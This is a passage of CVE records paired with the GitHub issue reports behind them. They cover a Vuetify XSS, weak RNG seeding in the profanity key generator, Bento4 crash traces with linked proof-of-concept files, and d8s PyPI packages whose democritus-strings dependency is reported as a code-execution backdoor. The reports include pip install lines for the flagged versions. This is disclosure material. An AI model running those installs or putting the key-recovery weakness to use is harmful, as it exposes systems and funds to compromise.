[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:vuetifyjs:vuetify:*:*:*:*:*:*:*:*", "matchCriteriaId": "5717CAE6-B23D-4EE0-88A8-5A98FF6D68E2", "versionEndExcluding": "2.6.10", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "2.0.1", "vulnerable": true }, { "criteria": "cpe:2.3:a:vuetifyjs:vuetify:2.0.0:beta4:*:*:*:*:*:*", "matchCriteriaId": "C8EA2D38-E38D-4913-82FF-949BD4358B6A", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:vuetifyjs:vuetify:2.0.0:beta5:*:*:*:*:*:*", "matchCriteriaId": "3B9DD644-5DC7-4297-B2B7-318242E112AD", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:vuetifyjs:vuetify:2.0.0:beta6:*:*:*:*:*:*", "matchCriteriaId": "2BF63ECA-F9A5-4269-ACF1-717401F5A6FB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:vuetifyjs:vuetify:2.0.0:beta7:*:*:*:*:*:*", "matchCriteriaId": "6C2F172F-EB66-4864-8D7A-F15BDFCBD84D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:vuetifyjs:vuetify:2.0.0:beta8:*:*:*:*:*:*", "matchCriteriaId": "ADE7EEE9-F3C0-46E7-87BD-1BEB43B73945", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:vuetifyjs:vuetify:2.0.0:beta9:*:*:*:*:*:*", "matchCriteriaId": "2E21A173-87E5-4F49-A9A4-5018664D3576", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/vuetifyjs/vuetify/issues/15757
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "vuetifyjs", "vuetify" ]
### Environment **Vuetify Version:** 2.6.9 **Vue Version:** 2.6.14 **Browsers:** Chrome 105.0.0.0 **OS:** Mac OS 10.15.7 ### Steps to reproduce Open the link and see the alert with xss. ### Expected Behavior Not use plain html ### Actual Behavior html is used and open an alert ### Reproduction Link <a href="https://codepen.io/5v3n-08/pen/MWGKEjY" target="_blank">https://codepen.io/5v3n-08/pen/MWGKEjY</a> ### Other comments Only work if this property is set :event-name="getCalendarEventName" <!-- generated by vuetify-issue-helper. DO NOT REMOVE -->
[Bug Report][2.6.9] xss in v-calendar
https://api.github.com/repos/vuetifyjs/vuetify/issues/15757/comments
0
2022-09-08T11:29:39Z
2022-09-08T14:43:19Z
https://github.com/vuetifyjs/vuetify/issues/15757
1,366,110,081
15,757
4,166
CVE-2022-40769
2022-09-18T17:15:09.667
profanity through 1.60 has only four billion possible RNG initializations. Thus, attackers can recover private keys from Ethereum vanity addresses and steal cryptocurrency, as exploited in the wild in June 2022.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://blog.1inch.io/a-vulnerability-disclosed-in-profanity-an-ethereum-vanity-address-tool-68ed7455fc8c" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/johguse/profanity" }, { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/johguse/profanity/issues/61" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://blog.1inch.io/a-vulnerability-disclosed-in-profanity-an-ethereum-vanity-address-tool-68ed7455fc8c" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/johguse/profanity" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/johguse/profanity/issues/61" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:profanity_project:profanity:*:*:*:*:*:*:*:*", "matchCriteriaId": "16E1CC96-F6AE-40E6-8DEE-1FAD971A615B", "versionEndExcluding": null, "versionEndIncluding": "1.60", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "338" ]
338
https://github.com/johguse/profanity/issues/61
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "johguse", "profanity" ]
Hi, could you elaborate on how private keys are being generated and brute forced? It seems like a reliable random number generator `std::mt19937_64` is being fully initialized by `unsigned int` (https://en.cppreference.com/w/cpp/numeric/random/random_device), which could make it less reliable: https://github.com/johguse/profanity/blob/75afbade7d4e8a54bd97b26249a84d2833a25b58/Dispatcher.cpp#L111 Seems like brute-forcing 2^32 seeds, each for a few seconds on top-notch hardware could expose some keys with 5-6-7 mined symbol.
Private key safety
https://api.github.com/repos/johguse/profanity/issues/61/comments
4
2022-01-17T08:50:54Z
2022-09-15T07:42:49Z
https://github.com/johguse/profanity/issues/61
1,105,545,328
61
4,167
CVE-2022-40774
2022-09-18T19:15:09.277
An issue was discovered in Bento4 through 1.6.0-639. There is a NULL pointer dereference in AP4_StszAtom::GetSampleSize.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/757" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/757" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*", "matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0", "versionEndExcluding": null, "versionEndIncluding": "1.6.0-639", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/axiomatic-systems/Bento4/issues/757
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi There, I tested the binary mp42ts with my fuzzer, and a crash incurred, i.e., SEGV on an unknown address error. Here are the details: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==6287==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000007021ab bp 0x7fff9e86cb50 sp 0x7fff9e86c5f0 T0) ==6287==The signal is caused by a READ memory access. ==6287==Hint: address points to the zero page. #0 0x7021ab in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) (/fuzztest/mp42ts/mp42ts+0x7021ab) #1 0x5754fc in AP4_AtomSampleTable::GetSample(unsigned int, AP4_Sample&) (/fuzztest/mp42ts/mp42ts+0x5754fc) #2 0x40d0cb in TrackSampleReader::ReadSample(AP4_Sample&, AP4_DataBuffer&) (/fuzztest/mp42ts/mp42ts+0x40d0cb) #3 0x418342 in main (/fuzztest/mp42ts/mp42ts+0x418342) #4 0x7f9ae1a41c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #5 0x407c99 in _start (/fuzztest/mp42ts/mp42ts+0x407c99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/fuzztest/mp42ts/mp42ts+0x7021ab) in AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) ==6287==ABORTING ``` ### System Details Test Machine: Ubuntu 18.04 (docker) Project Name: mp42ts (Bento4-1.6.0-639) ### Command ./mp42ts mp42ts.demo /dev/null ### Poc [mp42ts_Poc.zip](https://github.com/axiomatic-systems/Bento4/files/9590796/mp42ts_Poc.zip) ### Credit Wanying Cao (NCNIPC of China), (Zhongguancun Laboratory) Han Zheng (NCNIPC of China, [Hexhive](http://hexhive.epfl.ch/)), (Zhongguancun Laboratory)
SEGV at AP4_StszAtom::GetSampleSize(unsigned int, unsigned int&) in binary mp42ts
https://api.github.com/repos/axiomatic-systems/Bento4/issues/757/comments
2
2022-09-17T03:04:47Z
2023-06-26T09:40:27Z
https://github.com/axiomatic-systems/Bento4/issues/757
1,376,646,543
757
4,168
CVE-2022-40775
2022-09-18T19:15:09.323
An issue was discovered in Bento4 through 1.6.0-639. A NULL pointer dereference occurs in AP4_StszAtom::WriteFields.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/758" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/axiomatic-systems/Bento4/issues/758" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:axiosys:bento4:*:*:*:*:*:*:*:*", "matchCriteriaId": "180AEBD6-AF89-4F0F-856E-D8B977C762C0", "versionEndExcluding": null, "versionEndIncluding": "1.6.0-639", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/axiomatic-systems/Bento4/issues/758
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "axiomatic-systems", "Bento4" ]
Hi there, I use my fuzzer for fuzzing the binary mp4decrypt, and this binary crashes with the following: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==24087==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x000000702ee8 bp 0x7ffcf40a75f0 sp 0x7ffcf40a73b0 T0) ==24087==The signal is caused by a READ memory access. ==24087==Hint: address points to the zero page. #0 0x702ee8 in AP4_StszAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x702ee8) #1 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf) #2 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423) #3 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf) #4 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423) #5 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf) #6 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423) #7 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf) #8 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423) #9 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf) #10 0x4fc423 in AP4_ContainerAtom::WriteFields(AP4_ByteStream&) (/fuzztest/mp4decrypt/mp4decrypt+0x4fc423) #11 0x82facf in AP4_AtomListWriter::Action(AP4_Atom*) const (/fuzztest/mp4decrypt/mp4decrypt+0x82facf) #12 0x62cea7 in AP4_Processor::Process(AP4_ByteStream&, AP4_ByteStream&, AP4_ByteStream*, AP4_Processor::ProgressListener*, AP4_AtomFactory&) (/fuzztest/mp4decrypt/mp4decrypt+0x62cea7) #13 0x412846 in main (/fuzztest/mp4decrypt/mp4decrypt+0x412846) #14 0x7fcaa49f1c86 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21c86) #15 0x407c99 in _start (/fuzztest/mp4decrypt/mp4decrypt+0x407c99) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV (/fuzztest/mp4decrypt/mp4decrypt+0x702ee8) in AP4_StszAtom::WriteFields(AP4_ByteStream&) ==24087==ABORTING ``` ### System Details Test Machine: Ubuntu 18.04 (docker) Project Name: mp4decrypt (Bento4-1.6.0-639) ### Command ./mp4decrypt mp4decrypt.demo /dev/null ### Poc [mp4decrypt_Poc.zip](https://github.com/axiomatic-systems/Bento4/files/9591036/mp4decrypt_Poc.zip) ### Credit Wanying Cao(NCNIPC of China), (Zhongguancun Laboratory) Han Zheng (NCNIPC of China, [Hexhive](http://hexhive.epfl.ch/)), (Zhongguancun Laboratory)
SEGV error
https://api.github.com/repos/axiomatic-systems/Bento4/issues/758/comments
0
2022-09-17T06:02:37Z
2023-06-26T09:41:06Z
https://github.com/axiomatic-systems/Bento4/issues/758
1,376,678,566
758
4,169
CVE-2022-38881
2022-09-19T16:15:11.540
The d8s-archives for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-archives/issues/12" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-archives/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-archives/issues/12" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-archives/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:d8s-archives_project:d8s-archives:0.1.0:*:*:*:*:python:*:*", "matchCriteriaId": "83A7837F-25C6-41FC-ADB1-B4FDD9C884F2", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/democritus-project/d8s-archives/issues/12
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "democritus-project", "d8s-archives" ]
We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us. ![image](https://user-images.githubusercontent.com/58363074/186811407-e8c7a0a6-ab09-48a6-8dac-5c1c0ec507d6.png) The democritus-strings package can be successfully installed using `pip install d8s-archives==0.1.0` ![image](https://user-images.githubusercontent.com/58363074/186811854-62ff7d45-e903-4624-b696-621b4e0a1356.png) Suggestion: remove version 0.1.0 of this project in PyPI
code execution backdoor
https://api.github.com/repos/democritus-project/d8s-archives/issues/12/comments
0
2022-08-26T03:29:25Z
2022-08-26T03:33:10Z
https://github.com/democritus-project/d8s-archives/issues/12
1,351,697,173
12
4,170
CVE-2022-38882
2022-09-19T16:15:11.583
The d8s-json for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-json/issues/9" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-json/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-json/issues/9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-json/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:d8s-json_project:d8s-json:0.1.0:*:*:*:*:python:*:*", "matchCriteriaId": "93EB4C67-F5D4-4542-A457-7F1D29616363", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/democritus-project/d8s-json/issues/9
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "democritus-project", "d8s-json" ]
We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us. ![image](https://user-images.githubusercontent.com/58363074/186821786-016e7582-c0b4-4a96-b3e6-5de7aa1f246a.png) The democritus-strings package can be successfully installed using `pip install d8s-json==0.1.0` ![image](https://user-images.githubusercontent.com/58363074/186822035-681b6597-2939-4fce-b7d9-2776e7f92d90.png) Suggestion: remove version 0.1.0 of this project in PyPI
code execution backdoor
https://api.github.com/repos/democritus-project/d8s-json/issues/9/comments
0
2022-08-26T04:27:15Z
2022-08-26T04:27:15Z
https://github.com/democritus-project/d8s-json/issues/9
1,351,729,055
9
4,171
CVE-2022-38883
2022-09-19T16:15:11.627
The d8s-math for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-math/issues/11" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-math/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-math/issues/11" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-math/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:d8s-math_project:d8s-math:0.1.0:*:*:*:*:python:*:*", "matchCriteriaId": "8F0F790C-FBEC-47A1-9C7D-41F1EB7E2A79", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/democritus-project/d8s-math/issues/11
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "democritus-project", "d8s-math" ]
We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us. ![image](https://user-images.githubusercontent.com/58363074/186834802-6ddc6914-5822-466f-a0de-20a285a549f4.png) The democritus-strings package can be successfully installed using `pip install d8s-math==0.1.0` ![image](https://user-images.githubusercontent.com/58363074/186835321-7b2274a4-b47b-4158-827e-399507654d8b.png) Suggestion: remove version 0.1.0 of this project in PyPI
code execution backdoor
https://api.github.com/repos/democritus-project/d8s-math/issues/11/comments
0
2022-08-26T06:17:51Z
2022-08-26T06:17:51Z
https://github.com/democritus-project/d8s-math/issues/11
1,351,803,702
11
4,172
CVE-2022-38884
2022-09-19T16:15:11.667
The d8s-grammars for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-grammars/issues/6" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-grammars/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-grammars/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-grammars/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:d8s-grammars_project:d8s-grammars:0.1.0:*:*:*:*:python:*:*", "matchCriteriaId": "E1B38200-A8FC-44BE-B5A9-2D773765963F", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/democritus-project/d8s-grammars/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "democritus-project", "d8s-grammars" ]
We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us. ![image](https://user-images.githubusercontent.com/58363074/186838511-636fce35-798e-4716-8e26-9b48447927c8.png) The democritus-strings package can be successfully installed using `pip install d8s-grammars==0.1.0` ![image](https://user-images.githubusercontent.com/58363074/186838836-2defa1ab-8f73-4362-bf01-228d4ae82881.png) Suggestion: remove version 0.1.0 of this project in PyPI
code execution backdoor
https://api.github.com/repos/democritus-project/d8s-grammars/issues/6/comments
0
2022-08-26T06:41:07Z
2022-08-26T06:41:07Z
https://github.com/democritus-project/d8s-grammars/issues/6
1,351,823,443
6
4,173
CVE-2022-38885
2022-09-19T16:15:11.707
The d8s-netstrings for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-netstrings/issues/4" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-netstrings/" }, { "source": "cve@mitre.org", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/democritus-project/d8s-netstrings/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/d8s-netstrings/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Product" ], "url": "https://pypi.org/project/democritus-strings/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:d8s-netstrings_project:d8s-netstrings:0.1.0:*:*:*:*:python:*:*", "matchCriteriaId": "B861B080-43CF-44F3-8930-01FDD266AE53", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/democritus-project/d8s-netstrings/issues/4
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "democritus-project", "d8s-netstrings" ]
We discovered a potential code execution backdoor in version 0.1.0 of the project, the backdoor is the democritus-strings package. Attackers can upload democritus-strings packages containing arbitrary malicious code. For the safety of this project, the democritus-strings package has been uploaded by us. ![image](https://user-images.githubusercontent.com/58363074/186841299-acb7535a-e86a-4db3-9265-ebef8abf81f4.png) The democritus-strings package can be successfully installed using `pip install d8s-netstrings==0.1.0` ![image](https://user-images.githubusercontent.com/58363074/186841547-b064331f-4fcf-45a3-9fb5-c80b01fa3a1c.png) Suggestion: remove version 0.1.0 of this project in PyPI
code execution backdoor
https://api.github.com/repos/democritus-project/d8s-netstrings/issues/4/comments
0
2022-08-26T06:56:50Z
2022-08-26T06:56:50Z
https://github.com/democritus-project/d8s-netstrings/issues/4
1,351,836,702
4
4,174
CVE-2022-38886
2022-09-19T16:15:11.750
The d8s-xml for python, as distributed on PyPI, included a potential code-execution backdoor inserted by a third party. The backdoor is the democritus-strings package. The affected version is 0.1.0.
